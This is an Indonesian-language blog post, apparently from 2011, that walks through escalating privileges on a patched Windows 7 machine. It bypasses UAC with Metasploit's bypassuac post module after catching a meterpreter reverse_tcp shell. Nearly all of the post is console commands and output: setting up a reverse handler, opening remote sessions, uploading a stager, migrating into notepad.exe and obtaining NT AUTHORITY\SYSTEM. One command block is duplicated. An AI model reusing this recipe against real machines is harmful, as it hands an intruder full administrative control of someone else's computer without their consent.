Privilege escalation – windows UAC bypass

Pada Tutorial sebelumnya dijelaskan cara privileged escalation dengan  menggunakan kelemahan sistem operasi.Teknik tersebut hanya berlaku untuk windows Vista,2008,Windows Seven yang tidak di patch.Jika windowsnya sudah dipatch,teknik dengan schelevator script tidak dapat digunakan lagi.Untuk itu diperlukan teknik baru untuk mengatasi masalah ini.Salah satu teknik yang bisa digunakan adalah dengan cara membypass UAC ( Users Acces Control )

Menurut wikipedia :

User Account Control (UAC) is a technology and security infrastructure introduced with Microsoft’s Windows Vista and Windows Server 2008 operating systems, with a more relaxed[1] version also present in Windows 7 and Windows Server 2008 R2 . It aims to improve the security of Microsoft Windows by limiting application software to standard user privileges until an administrator authorizes an increase or elevation. In this way, only applications trusted by the user may receive administrative privileges, and malware should be kept from compromising the operating system. In other words, a user account may have administrator privileges assigned to it, but applications that the user runs do not inherit those privileges unless they are approved beforehand or the user explicitly authorizes it

Jadi program yang tidak mempunyai Windows Publisher certificate dijalankan dengan hak administrator,windows akan menampilkan sebuah peringatan seperti pada gambar diatas.

tools :

– Metasploit v3.7.0-dev
– OS : windows 7 x64 bit fully patched

Tanpa UAC bypass :

=[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ — –=[ 682 exploits – 350 auxiliary
+ — –=[ 218 payloads – 27 encoders – 8 nops
=[ svn r12260 updated today (2011.04.06)

resource (multihander.rc)> use exploit/multi/handler
resource (multihander.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (multihander.rc)> set LHOST 172.16.16.2
LHOST => 172.16.16.2
resource (multihander.rc)> set LPORT 443
LPORT => 443
resource (multihander.rc)> exploit -j -z
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.16.2:443
[*] Starting the payload handler…
msf exploit(handler) >
[*] Sending stage (749056 bytes) to 172.16.16.15
[*] Meterpreter session 1 opened (172.16.16.2:443 -> 172.16.16.15:49157) at 2011-04-07 15:35:40 +0700
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…
meterpreter > getuid
Server username: ian-PC\ian
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter >

ketika melakukan privilege escalation,windows membatalkan caranya tersebut.

dengan UAC bypass

meterpreter > background
msf exploit(handler) > back
msf > use post/windows/escalate/bypassuac
msf post(bypassuac) > show options

Module options (post/windows/escalate/bypassuac):

Name Current Setting Required Description
—- ————— ——– ———–
LHOST no Listener IP address for the new session
LPORT 4444 no Listener port for the new session
SESSION yes The session to run this module on.

msf post(bypassuac) > set LHOST 172.16.16.2
LHOST => 172.16.16.2
msf post(bypassuac) > set SESSION 1
SESSION => 1
msf post(bypassuac) > exploit -j

meterpreter > background
msf exploit(handler) > back
msf > use post/windows/escalate/bypassuac
msf post(bypassuac) > show options

Module options (post/windows/escalate/bypassuac):

Name Current Setting Required Description
—- ————— ——– ———–
LHOST no Listener IP address for the new session
LPORT 4444 no Listener port for the new session
SESSION yes The session to run this module on.

msf post(bypassuac) > set LHOST 172.16.16.2
LHOST => 172.16.16.2
msf post(bypassuac) > set SESSION 1
SESSION => 1
msf post(bypassuac) > exploit -j
[*] Post module running as background job
msf post(bypassuac) >
[*] Started reverse handler on 172.16.16.2:4444
[*] Starting the payload handler…
[*] Uploading the bypass UAC executable to the filesystem…
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem….
[*] Sending stage (749056 bytes) to 172.16.16.15
[*] Meterpreter session 2 opened (172.16.16.2:4444 -> 172.16.16.15:49158) at 2011-04-07 15:37:50 +0700
[*] Session ID 2 (172.16.16.2:4444 -> 172.16.16.15:49158) processing InitialAutoRunScript ‘migrate -f’
[*] Current server process: rqsMMaqTfYiwB.exe (2928)
[*] Spawning a notepad.exe host process…
[*] Migrating into process ID 2356
[*] New server process: notepad.exe (2356)
msf post(bypassuac) > sessions -l

Active sessions
===============

Id Type Information Connection
— —- ———– ———-
1 meterpreter x86/win32 ian-PC\ian @ IAN-PC 172.16.16.2:443 -> 172.16.16.15:49157
2 meterpreter x86/win32 ian-PC\ian @ IAN-PC 172.16.16.2:4444 -> 172.16.16.15:49158
msf post(bypassuac) > sessions -i 2
[*] Starting interaction with 2…

meterpreter > getuid
Server username: ian-PC\ian
meterpreter > getsystem
…got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Privilege escalation bisa dilakukan..
How It Works:

bypassuac script menggunakan payload windows/meterpreter/reverse_tcp secara default.aplikasi pendukung untuk melakukan bypassuac ( data/post/bypassuac-x64.exe ) diupload ke target system.kemudian metasploit melakukan generate payload dan hasilnya akan diupload lagi ke mesin target.setelah itu bypassuac-x64 akan dieksekusi dengan perintah : bypass-x64.exe /c meterpreter_payload.exe.
payload yang digunakan juga secara otomatis melakukan proses migrating ke proses yang lain.

hope you enjoy

Posted on April 7, 2011, in Hacking & security and tagged , , , . Bookmark the permalink. 1 Comment.

  1. i wish, found this earlier…

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: